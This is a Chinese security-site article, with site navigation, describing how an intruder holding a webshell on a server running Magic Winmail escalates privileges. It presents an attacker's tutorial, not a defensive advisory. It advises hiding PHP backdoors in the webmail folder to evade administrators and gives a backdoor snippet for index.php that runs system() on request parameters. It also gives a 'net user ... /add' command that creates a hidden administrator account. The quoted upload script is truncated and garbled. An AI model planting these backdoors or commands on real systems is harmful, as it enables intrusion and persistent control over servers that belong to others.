文章分类 | 推荐文章 | 最新文章 | 热点文章 | 最新软件 | 精品软件 | 下载排行 | 推荐下载 | 免费看大片 | WPS | 杀毒软件
清风网络
首 页 软件下载 网络学院 数码学院
QQ 电脑入门 游戏 操作系统 图形处理 办公软件 媒体动画 精文荟萃 工具软件 网络编程 程序开发 网络技术 认证考试 网站建设 文章专栏
当前位置:清风网络学院网络技术网络安全使用Magic Winmail来提升权限
精品推荐
特别推荐
·无线入侵的技术细节
·SQL注入和CSS攻击的检测
·详解:五种Windows常用密码设置
·浅析黑客攻击时的常用方法和攻击步骤
·不怕攻击 家庭上网必学八招安全绝招
·入门者如何获取肉鸡
·Linux安全配置步骤简述
·Wi-Fi网络安全探讨及组网策略
·网页病毒的概念
·保障您网站安全的十点技巧
·技巧:网上交易密码保护的几种窍门
·六个简单方法防止上网被钓鱼
·PING命令的小秘密
·安全第一 网络端口扫描技术介绍
·十大网络工具帮你审核网络安全
·信息安全问题需解决方案
·多角度详细解释网站安全保护方法
·端口截听实现端口隐藏,嗅叹与攻击
·用Win NT/2K 建WEB站点安全指南
·实现 Web 应用程序安全的捷径
热点TOP10
·解析远程控制带来的安全危险
·不怕攻击 家庭上网必学八招安全绝招
·内网数据库服务器入侵实战
·MD5 Password Cracker 一个国外的md5爆破工具(速度极快)
·安全漏洞的起因:ActiveX技术安全报告
·黑客攻击步骤-如何获得IP
·认识映象劫持技术原理与解决办法
·保障您网站安全的十点技巧
·交换环境下SNIFFER的攻击技术手段
·防范于未然 2008五大企业安全问题预测
·假冒腾讯qq网络骗子欺诈骗术大曝光
·企业安全 减少内部安全风险的10种方法
·让尘封的DOS机莺歌燕舞欢喜过大年
·确保数据中心虚拟化安全10个步骤
·2007年12月十大网络安全漏洞综述
·大网站是保障网络安全的技巧
·检查并堵住网站的eWebEditor漏洞
·面临什么新威胁 PC安全终极指南
·深入理解防火墙 屏蔽外界攻击
·预防网络病毒的几个忠告

使用Magic Winmail来提升权限

日期:2005年10月31日 作者: 查看:[大字体 中字体 小字体]


环境:所有使用了Magic Winmail软件的服务器,前提你已经得到了一个webshell :)
Magic Winmail是一款很不错的mail server 软件,深受不少网站的青睐。主要是一些中小的网站。但是在笔者最近的一次渗透中发现,装有改软件的服务器,如果一旦被入侵者得到webshell就可以通过这个软件来提升权限,非常危险。
装有Magic Winmail的服务器会在系统上开启8080端口,对外提供邮件服务。使用过它的人应该知道。这个Magic Winmail服务器支持php脚本解析。图1
Click to Open in New Window

在装有Magic Winmail的文件夹下有
一个server的文件夹,其下有webmail文件夹。图2
Click to Open in New Window

大家可以发现这个文件夹下是一些php脚本的文件。因为Magic Winmail这个软件可以解析php脚本,也真是我们利用这个漏洞来提升权限的得力帮手。发现这个方法实属偶然,本来我想在这个服务器上装个后门,怎么装呢? 由于本人思路比较怪。一般不会使用常规的方法,就在这个服务器8080端口上打主意了。这个Magic Winmail就是最佳地点。你在d:\MagicW~1\server\webmail[我测试的机器上的物理路径]文件下随便放置php脚本,不管是脚本注入式的还是普通的php脚本,随便放! 而且lis0提示请放心大胆使用,不会有日志吗? 菜鸟了吧。一般系统被入侵,管理员到系统盘下又是md5校验又是脚本木马查杀的。他做梦也想不到我们的脚本会放在这个文件夹下,lis0推荐使用注入式的脚本或者是自己写的不被杀毒软件能K的脚本。我哪个脚本? Lis0使用的是angel写的一个up.php,又插入了一点东西。玩的时候,上传个自己修改过的脚本或者其它东东,很方便。日志呢?当然还是有的。不过还是在Magic Winmail文件夹下,到目前为止能到这个文件夹下查看日志的网管还真的是不多,除非看了这篇文章 :)
up.php的codz

";
echo "http://";.$SERVER_NAME."".dirname($PHP_SELF)."/".$fname."";
} else {
echo "上传失败";
}
?>
" METHOD="POST">



其实我们可以将如下的代码插入到Magic Winmail的index.php文件中去,它的功能已经构多了。加上lis0发现的漏洞。这就算是个最完美的后门了。
if ($id=="1"){
system($cmd);
show_source($file);
copy($a,$b);unlink($a);
}
?>
我们使用http://www.target.com:8080/index.php?id=1&YY=XX 就可以正大光明地访问我们的肉鸡了。好像这样做太黑了点:)
还没说漏洞呢?废话多了。将一个php的脚本放在d:\MagicW~1\server\webmail下,图3
Click to Open in New Window

然后正大光明地 net user lis0 lis0 /add & net localgroup administrators
lis0 /add 这个就是哥们发现的漏洞,不相信, 让肉鸡来证明我说的是没错的啊。图4

[1] [2] 下一页 




上一篇:解析系统漏洞扫描的两大类型

下一篇:CHM帮助文件的编程实现

使用Magic Winmail来提升权限 相关文章:
·IE7.0浏览器有用的9个使用技巧
·GHOST使用方法(图解)
·电脑使用一段时间后会变慢原因解析
·Vista系统使用技巧总结
·溯雪使用说明
·QQ空间导航代码最新版使用方法
·教您如何使用无线上网全攻略
·TninkPad笔记本电池使用指南
·腾讯QQ号码使用完全指南
·为什么iexplore.exe在打开网页时CPU使用会100%?
使用Magic Winmail来提升权限 相关软件:
·Video Edit Magic V4.34
·黑客视频教程 VMware虚拟机的安装和使用
·使用GPMC随心所欲管理组策略
·黑客视频教程-灰鸽子远控使用教程
·Adobe Photoshop CS 2 简体中文使用指南
·FLASH 8中文使用手册
·数码相机购买使用宝典 V1.03.29
·Magic Utilities2003 V2.1.0 汉化版
·IIS4使用手册
·魔法门6天堂之令(Might and Magic VI The Mandate of Heaven) 简体中文版

特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源:http://www.viphot.com
| 帮助(?) | 版权声明 | 友情连接 | 关于我们 | 信息发布
Copyright 2007 www.viphot.com All Rights Reserved. 鄂ICP备05000083号Powered by:viphot